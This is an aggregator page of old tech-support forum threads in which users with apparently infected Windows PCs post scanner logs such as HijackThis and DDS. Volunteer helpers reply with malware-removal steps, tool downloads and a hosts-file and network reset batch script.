using ad-aware I found a file in the windows system folder that did not look familiar: yrbxysxr.exeI decided to run hijackthis and post the log to see if anyone could help. ThanksLogfile of Trend Micro HijackThis v2.0.2Scan saved at 8:29:07 PM, on 10/12/2007Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSvcHst.exeC:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\Explorer.EXEC:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Java\jre1.6.0_02\bin\jusched.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\PROGRA~1\NORTON~2\NORTON~1\NPROTECT.EXEC:\PROGRA~1\NORTON~2\NORTON~1\SPEEDD~1\NOPDB.EXEC:\... Read more

Answer:S.o.s. Compromised Computer

Hello and welcome to BC.

Sorry for the late response. If you haven't received help elsewhere yet and still need help, please post a fresh HijackThis log and I'll be happy to help you.

20 more replies
Relevance 49.2%

I've got a computer at work that seems to be fairly compromised. I've followed all of the steps listed in the 'read this topic' message and am at the point where I get to post a hijack this log (joy!). Basically this system has popups that show up constantly and the typical cleaning programs/methods have not gotten the popups to go away. Virtumonde has been detected on the system but I haven't been able to get it cleaned up yet. Basically each time I run a scan (with whatever program) it finds new things that weren't there on the previous scan. I just need to figure out the root cause of these popups and get rid of it. The date on the comp was set wrong at the time of the scan. I took this scan 20 minutes ago.Logfile of Trend Micro HijackThis v2.0.2Scan saved at 1:45:33 PM, on 7/21/2003Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16473)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Windows Defender\MsMpEng.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Logitech\Bluetooth\LBTSERV.EXEC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exeC:\Program Files\WIDCOMM�... Read more

Answer:Compromised Computer

Welcome to the BleepingComputer HijackThis Logs and Analysis forum ensoll My name is Richie and i'll be helping you to fix your problems.It appears you've no virus protection installed.Download\install one of the following freeware options from the choice below.Once installed update its definitions and then run a full system virus scan.AVG7 Free Edition Antivirus:http://free.grisoft.com/softw/70free/setup...ree_446a965.exeAvast! 4 Home Edition: http://files.avast.com/iavs4pro/setupeng.exeAvira AntiVir Personal Edition Classic http://www.free-av.com/------------------------------Please download VundoFix.exe to your desktop.Double-click VundoFix.exe to run it.When VundoFix re-opens,click the "Scan for Vundo" button.Once it's done scanning,click the "Remove Vundo" button.You will receive a prompt asking if you want to remove the files, click "YES".Once you click yes, your desktop will go blank as it starts removing Vundo.When completed,it will prompt that it will reboot your computer,click "OK".Post the contents of C:\vundofix.txt into your next reply.Note: It is possible that VundoFix encountered a file it could not remove.In this case,VundoFix will run on reboot,simply follow the above instructions starting from "Click the Scan for Vundo button." when VundoFix appears at reboot.------------------------------Please download Combofix and save to your desktop:Note: It is important that it is saved directly to your d... Read more

1 more replies
Relevance 49.2%

Hi there,

Im trying to help my mum out with her computer. After a visit to her local bank they informed her that someone had got her bank details online and has been ordering video games for themselves from this. I need to ensure that her PC is like fort Knox as im meant to be good with computers but need help this time. Heres what ive tried so far:-

Ran MSE anti-virus, updated and full scan: nothing found.
Ran Malwarebytes anti malware: updated and full scan: nothing found

IE is the latest version but it seems to have adverts all over the place. Ive disabled all add-ons but to no avail. Is the best thing to do next uninstall and reinstall IE?

Thanks for any advice given to me.

Answer:Computer compromised

The first thing you need to do is change all passwords, using a "known clean" computer. Do not use the infected one!

Next, flush the bad DNS cache and restore MS's Hosts file:
Copy and paste these lines in Note pad.

@Echo on
pushd\windows\system32\drivers\etc
attrib -h -s -r hosts
echo 127.0.0.1 localhost>HOSTS
attrib +r +h +s hosts
popd
ipconfig /release
ipconfig /renew
ipconfig /flushdns
netsh winsock reset all
netsh int ip reset all
shutdown -r -t 1
del %0

Save as flush.bat to your desktop.
Double click on the flush.bat file to run it.Vista and Windows 7... right click the .bat file and choose to run as Administrator. Your computer will reboot itself.

Now, download DDS from one of these links:
DDS.com
DDS.pifDisable any script blocking protection
Double click the dds icon to run the tool.
When done, DDS will open two (2) logs: DDS.txt
Attach.txt <--- will be minimized in the task tray

Save both reports to your desktop.

Include the contents of both logs in your next post.
The scan will instruct you to post Attach.txt as an attachment.

4 more replies
Relevance 49.2%

Good morning,
I need help!
Yesterday, I found out that one of my online bank account (Bank A) has been compromised. I do most of my banking online, so I link my other banks (Bank B and Bank C) into this bank.

On July 10, Bank A instructed ACH transfers from Bank B($2000) and Bank C($2500) into Bank A. I dont know if i should say I am lucky because I dont have much money, but because i dont have much money those ACH transfers are denied (Non-sufficient fund).

So, yesterday, I went online into Bank A, and i did found 2 instructions. So, 1st impression that maybe banks screw up the transactions (should be other poeople account). Then, later when i look at the bank setup, I found a new bank that is waiting to be verified for linking with Bank A. Then, I know I have problem. So, I have called the bank and report this.

I googled, and found this site. I saw a posting about Keylogger and many replies of helps. So, i am hoping i can get your helps as well.

For the past 2 months, I have several things that happens differently.
1. I started to play World of Warcraft battlenet again...
2. I receive a new computer from work
3. My wife started to use computer at home more often, but mostly to go friendster.com (I think)

I uninstalled my zonealarm because I have been having problem restarting.
But prior to this, i have zonealarm, spydoctor, avg antivirus installed. Right now, I have hijackthis, panda (didnt get catch anything), trojanhunters (found 2 trojans, but t... Read more

More replies
Relevance 49.2%

edit: sorry for not posting the malware name in title its JPGIFRAMERi feel that some kind of malware has recently compromised my computer. symptoms:random internet dropslow computermcafee randomly repairing jpg files from the virus JPGiframerbeen a logn time since i got a windows updateheres an HJT log. halp me!!!Logfile of Trend Micro HijackThis v2.0.2Scan saved at 8:36:23 PM, on 5/6/2009Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Creative\Shared Files\CTAudSvc.exeC:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exeC:\Program Files\Bonjour\mDNSResponder.exeC:\PROGRA~1\McAfee\MSC\mcmscsvc.exec:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exec:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exeC:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exeC:\Program Files\McAfee\MPF\MPFSrv.exeC:\WINDOWS\system32\nvsvc32.exeC:\PROGRA~1\McAfee\VIRUSS~1&... Read more

Answer:Compromised computer

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

2 more replies
Relevance 49.2%

Been fighting this for a week and I can't find anything actually wrong, but I know something has to be there. My Warcraft account was recently hacked and based on some of the actions of the hacker I have to assume that they have gained access to my computer. Not only have they gotten my login information everytime I change it, but they have gotten some files submitted to Blizzard. Despite running multiple virus and malware scans nothing has ever come up. I am reluctant to simply reformat because I would like to at least try to understand how this has occured, but you can't fix what you can't find.
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16750  BrowserJavaVersion: 10.45.2
Run by troy at 1:30:21 on 2014-01-14
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.4094.1950 [GMT -6:00]
.
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Emsisoft Anti-Malware *Disabled/Updated* {8504DEEF-CC04-1F76-2137-F1A5F4A659DA}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Emsisoft Anti-Malware *Disabled/Updated* {3E653F0B-EA3E-10F8-1B87-CAD78F211367}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
C:\Windows\system32\svc... Read more

Answer:Computer Compromised

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/520819 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

17 more replies
Relevance 49.2%

Completed the Read & Run Me First procedures. Attached the following reports ConterSpy, Bitdefender, Panda Active Scan, Runkeys, Newfiles and HGJ log.

PROBLEMS:

(1) Downloaded Easyjob Resume V2.7995 demo. Tried to install crack EasyJob.Resume.Builder.v2.790_CRKEXE-FFF.zip. Program showed to be activated and registered but was not working properly. Could not print nor save files. Over course of day the program began crashing. Program crashing is getting worst.

(2) When using IE browser will be directed to various types of advertisements.


(3) Not sure when or how...possibly while using Easyjob Pro had AVG active protection running. Alerts came up several, many times about possible intrusion. Got frustrated and zoned out one too many times -- may have deleted file(s) I shouldn't have. or
during scanning and removal of spyware/malware I removed this file(s). In any event unable to utilize Control Panel's Add and Remove Program feature. A message box appears. Windows cannot find 'C:\WINDOWS\system32\rundll32.exe'. Make sure you typed name correctly....


Beginning to read Official Hijack This Tutorial to get up to speed on deciphering this myself...in a time crunch need your assistance to resolve these issues because I must get resume out by Friday for prospective employer.
 

Answer:Computer compromised 1 0f 2

Computer compromised 2 0f 2

Completed the Read & Run Me First procedures. Attached the following reports ConterSpy, Bitdefender, Panda Active Scan, Runkeys, Newfiles and HGJ log.

PROBLEMS:

(1) Downloaded Easyjob Resume V2.7995 demo. Tried to install crack EasyJob.Resume.Builder.v2.790_CRKEXE-FFF.zip. Program showed to be activated and registered but was not working properly. Could not print nor save files. Over course of day the program began crashing. Program crashing is getting worst.

(2) When using IE browser will be directed to various types of advertisements.


(3) Not sure when or how...possibly while using Easyjob Pro had AVG active protection running. Alerts came up several, many times about possible intrusion. Got frustrated and zoned out one too many times -- may have deleted file(s) I shouldn't have. or
during scanning and removal of spyware/malware I removed this file(s). In any event unable to utilize Control Panel's Add and Remove Program feature. A message box appears. Windows cannot find 'C:\WINDOWS\system32\rundll32.exe'. Make sure you typed name correctly....

Beginning to read Official Hijack This Tutorial to get up to speed on dissevering this myself...in a time crunch need your assistance to resolve these issues because I must get resume out by Friday for prospective employer.
 

13 more replies
Relevance 49.2%

Hi! I posted a log a while back for a different computer and ended up replacing that one, but now I'm afraid my laptop may now be infected.Can someone please take a look at my logs & let me know if I have anything remaining? I ran Malwarebytes Anti-malware and it removed a few items, but my computer is still acting strangely.Thank you in advance!Logfile of Trend Micro HijackThis v2.0.4Scan saved at 1:14:41 PM, on 10/13/2010Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\System32\WLTRYSVC.EXEC:\WINDOWS\System32\bcmwltry.exeC:\WINDOWS\system32\spoolsv.exec:\drivers\audio\r211990\stacsv.exeC:\Program Files\Cisco Systems\VPN Client\cvpnd.exeC:\PROGRA~1\SYMANT~1\SYMANT~1\DefWatch.exeC:\Program Files\Java\jre6\bin\jqs.exeC:\PROGRA~1\SYMANT~1\SYMANT~1\Rtvscan.exeC:\WINDOWS\system32\DRIVERS\o2flash.exeC:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exeC:\Program Files\Dell Support Center\bi... Read more

Answer:Computer may be compromised

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below I will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Follow the ... Read more

2 more replies
Relevance 49.2%

So my dad tells me that his desktop computer is acting all weird, and I have a feeling something may be infected. Internet Explorer.exe cannot be found, I think it was deleted or renamed, which raises alot of questions as to how that happened. Here is my Hijack This Log File... Thank you !
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:29:49 PM, on 2/14/2010
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Unable to get Internet Explorer version!
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Dell Network Assistant\hnm_svc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files\Google\Google Desktop Search\Goo... Read more

Answer:Computer compromised

9 more replies
Relevance 49.2%

Hello,

I'm hoping I can get a second opinion to a question I posed on the MS Win7 Forum. The answer seemed to go against what I've read on numerous computer security sites regarding different software to have. Also mentioned was "first I would dump anything Norton", many sites gave it extremely high marks, but anyway. It seemed reply was all negative without answering question. Here is what I posted, and His answer, Hope this is okay.

One thing I didn't think to add to original question was that I'm using Norton Safe Search in toolbar if that matters. _______________________________________________________________________________________________________________________________________________________________
Is my computer compromised?

Win7, IE9, Norton Internet Security 2011, (Malwarebytes, SuperAntispyware, and Ad-Aware, I only use the ones in brackets as secondary scans and not actively running.

I notice sometimes at many different websites my toolbar will what I say is "move down a step" and leave a blank like toolbar (empty of course) above it just below the address bar.

I'm using Norton Internet Security 2011, and have Malwarebytes, SuperAntispyware, and Ad-Aware as just secondary scanners. I keep everything updated at least weekly, though Norton automatically updates on its own the same as Windows. Everytime I do scans (weekly) they all come up clean.

With the toolbar moving down leaving an empty space between ... Read more

More replies
Relevance 49.2%

Hello everybody!

I finally removed Spyware Protect 2009 from my computer with Malwarebytes, and just wanted to know if my personal info (banking records, etc..) can be accessed by others on the web. I don't see any TDSS/backdoor.bot, soo... idk, just want to be sure. Any help is appreciated. Here is my log:
Malwarebytes' Anti-Malware 1.33
Database version: 1733
Windows 5.1.2600 Service Pack 2

2/5/2009 8:31:53 PM
mbam-log-2009-02-05 (20-31-53).txt

Scan type: Quick Scan
Objects scanned: 75586
Time elapsed: 19 minute(s), 59 second(s)

Memory Processes Infected: 1
Memory Modules Infected: 1
Registry Keys Infected: 4
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 4

Memory Processes Infected:
C:\WINDOWS\sysguard.exe (Trojan.FakeAlert) -> Unloaded process successfully.

Memory Modules Infected:
C:\WINDOWS\system32\iehelper.dll (Trojan.Vundo.H) -> Delete on reboot.

Registry Keys Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c9c42510-9b21-41c1-9dcd-8382a2d07c61} (Trojan.Vundo.H) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\CLSID\{c9c42510-9b21-41c1-9dcd-8382a2d07c61} (Trojan.Vundo.H) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{c9c42510-9b21-41c1-9dcd-8382a2d07c61} (... Read more

Answer:Is my computer compromised?

Hi DAUeleven and welcome to BCPlease print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights"Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.Please copy and paste the contents of Report.txt in your next reply.Be sure to renable you anti-virus and and other security programs before connecting to the Internet.-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.

1 more replies
Relevance 49.2%

Hi there,

Im trying to help my mum out with her computer. After a visit to her local bank they informed her that someone had got her bank details online and has been ordering video games for themselves from this. I need to ensure that her PC is like fort Knox as im meant to be good with computers but need help this time. Heres what ive tried so far:-

Ran MSE anti-virus, updated and full scan: nothing found.
Ran Malwarebytes anti malware: updated and full scan: nothing found

IE is the latest version but it seems to have adverts all over the place. Ive disabled all add-ons but to no avail. Is the best thing to do next uninstall and reinstall IE?

Thanks for any advice given to me.

Answer:Computer compromised

Run HiJackthis and post the log file as well.

I would also recommend checking to make sure that there are no rootkits; can be done with TDSSKiller by Kaspersky (free tool).

Also, I would shy away from IE if possible. Go with FireFox or Chrome, and install ad-block / flash block extensions. This way, ads are blocked and flash is blocked by default unless you click on the video's frame and click play (good way to block flash-based ads as well).

I would also recommend NoScript for FF, but can be a bit tricky if used by a non-technical person as it will block individual sites requesting access on a single site (i.e. has embedded links / resources and such).

5 more replies
Relevance 48.79%

Hello I am trying to fix a computer running windows 8. A user had clicked on an email that contained a virus or some malware of some sort. The symptoms of the virus: Bitdefender custom settings are at basically disabled and trying to click them on isn't working as the setting is instantly reset back to not on in "custom settings" -- basically no antivirus ability, can't update in normal mode and can't get an internet connection (tyrannasourus icon in google chrome) in regular user mode. Here are some of the things I have already attempted to alleviate the problem (roughly in order): I got the computer into safe mode with networking (internet works, but bitdefender does not).I downloaded kaspersky tdsskiller and ran it to no avail.I downloaded and ran mbam also to no avail. At another point I attempted a system restore, a point well beyond the infection, the 2nd one. Still didn't work. I then tried bitdefenders rescue disk that I dl'd and burnt. Its graphics at the start were ok, then it went all messed up with errors and blurry graphics. It just didn't work... perhaps because it's 64-bit windows, as my 32 bit machine was fine using it. I then got more serious about backing up files and changed settings in the UEFI or the windows 8 bios to run a linux mint live CD to recover files.Files were copied to another computer in the event that the most drastic thing has to happen -- formatting/reinstalling/whatever.So the typical legacy, secure boot off, ... Read more

Answer:Bitdefender compromised by email virus - and internet access

Hello...

Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
[list]Flush DNSReport IE Proxy SettingsReset IE Proxy SettingsReport FF Proxy SettingsReset FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Users, Partitions and Memory size.Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

.

Download TDSSKiller and save it to your desktop.Extract (unzip) its contents to your desktop.Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.If an infected file is detected, the default action will be Cure, click on Continue.If a suspicious file is detected, the default action will be Skip, click on Continue.It may ask you to reboot the computer to complete the process. Click on Reboot Now.If no reboot is require, click on Report. A log file should appear. Please copy and paste the contents of that file here.If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here..
.
.
ADW Cleaner

Please download AdwCleaner by Xplode and save to your Desktop.Double-click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and... Read more

9 more replies
Relevance 48.79%

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.16428  BrowserJavaVersion: 10.45.2
Run by Tyrone at 1:06:25 on 2013-12-11
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6010.4399 [GMT -8:00]
.
AV: Norton Security Suite *Enabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Security Suite *Enabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Norton Security Suite *Enabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files\Common Files\Intel\Wireless... Read more

Answer:removed virus and restored to factory settings... Still compromised?!

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Your DDS log is clean.Any issues with this computer?

2 more replies
Relevance 48.79%

Is there anyway avast can be compromised showing its operating normally or any other scan engine such as malware bytes and Super Anti Spyware! How would one know if the system is compromised if it operates normally as if it had not been compromised by malware? Would this come up in a OTL log or some other type of utility! If it is compromised how could it be fixed and how can you find out?
 

Answer:Solved: Compromised Anti Virus & Firewall's 3rd Party etc

Try downloading the eicar test virus, that will verify if your antivirus is still working.

http://www.eicar.org/anti_virus_test_file.htm

Note: since you have several security programs, enable one at a time and do the download. See if each picks up the eicar.

To test your firewall, go to Sheilds Up at grc.com
 

1 more replies
Relevance 48.38%

Currently my computer has a number of issues, these started when I downloaded what I thought was a no-cd crack for Diablo 2: Lord of Destruction (I DO own the game, however I cannot find my cd ><). I noticed immediately after unzipping the files that I had a problem, popups everywhere, I couldn't go into my computer without errors showing up (these are fixed as I use spybot and it took care of most of these things, however I still do have popups). I also cannot use ctrl+shift+esc to get to task manager, nor can I use ctrl+alt+del to get to task manager as apparently task manager is "disabled".

Currently if I google anything and click any link that would lead me to where I would search, I go to this link

Mods note:

<URL removed>

Hmm, I can't think of any other problems that I would think originated from infection, however I somehow managed to accidentally uninstall my soundcard driver - if anyone can assist me in finding that I'd much much appreciate it - though I'm mostly concerned with getting my computer virus free. (I don't really know what sound card I have, however this is a link to the exact model of PC I have - the only thing I have upgraded in my PC is my video card which should be a non issue - http://www.dealtime.com/xPF-Gateway-...VDRW-Dual-Laye)

My Log:
Deckard's System Scanner v20071014.68
Run by Owner on 2008-04-08 19:57:04
Computer is in Normal Mode.
--------------------------------------------------------------------... Read more

Answer:Frustrated with compromised computer

Hi and welcome to TSF.

I am currently reviewing your log. Please note that this is under the supervision of an expert analyst, and I will be back with a fix for your problem as soon as possible.

You may wish to subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please be patient with me during this time.

11 more replies
Relevance 48.38%

I play World of Warcraft and recently had my account taken control of. I then realised since I have never given out my password, it must be a keylogger.

I ran KL-Detector while I screwed around in notepad and a few other things, and this is what it came up with
Code:
KL-Detector has found some suspicious files:
C:\Users\Taylor\AppData\Local\Temp\~DFF1AC.tmp
C:\Users\Taylor\AppData\Local\Temp\~DFFCBB.tmp
C:\Program Files\World of Warcraft\Logs\SESound.log

Please check; someone might have installed a keylogger on your computer!
You MAY want to take a look at:
C:\Users\Taylor\AppData\Local\Temp\
C:\Program Files\World of Warcraft\Logs\
C:\Users\Taylor\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Windows\Prefetch\
C:\Users\Taylor\AppData\Local\VirtualStore\Program Files\World of Warcraft\Cache\WDB\enUS\

>>FULL REPORT<<

Below are some file operations that were done during the monitoring process.
Review them carefully and check for suspicious files.
C:\Users\Taylor\AppData\Local\Microsoft\Windows\UsrClass.dat
was modified.

C:\Users\Taylor\AppData\Local\Microsoft\Windows\UsrClass.dat
was modified.

C:\Users\Taylor\ntuser.dat.LOG1
was modified.

C:\Users\Taylor\NTUSER.DAT
was modified.

C:\Users\Taylor\NTUSER.DAT
was modified.

C:\Windows\Prefetch\KL-DETECTOR.EXE-BAE45825.pf
was modified.

C:\Windows\Prefetch\KL-DETECTOR.EXE-BAE45825.pf
was modified.

C:\Windows\Prefetch\NOTEPAD.EXE-EB1B961A.pf
was modified.

C:\Windows\Prefetch\NOTEPAD.EXE-EB1B961A.pf
was... Read more

Answer:Computer compromised with a keylogger

Hey guys, if the KL detector doesn't mean much, just ignore it and look at the hijack this post.

Thanks guys!
 

3 more replies
Relevance 48.38%

Somehow someone is seeing my passwords on my computer and accessing some of my accounts specifically my Verizon account and Vanguard so far.  I have a flag setup on credit bureaus and setup security features and alerts in all my accounts.  I'm posting Speccy and ToolBox below.  Curious if you see anything suspicious or have any recommendations?  Thanks
 
 
http://speccy.piriform.com/results/akVa5YbYYOg6ghUMB30gqou
 
 
MiniToolBox by Farbar  Version: 21-07-2014
Ran by zj (administrator) on 07-03-2015 at 16:20:55
Running from "C:\Users\zj\Desktop"
Microsoft Windows 7 Professional  Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (03/07/2015 02:51:02 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (03/06/2015 11:32:28 AM) (Source: LMS) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
 
Error: (03/06/2015 10:46:09 AM) (Source: LMS) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
 
Error: (03/05/2015 09:24:18 AM) (Source: Application Error) (User: )
Description: Faulting application name: NinjaTrader... Read more

Answer:Computer security compromised..

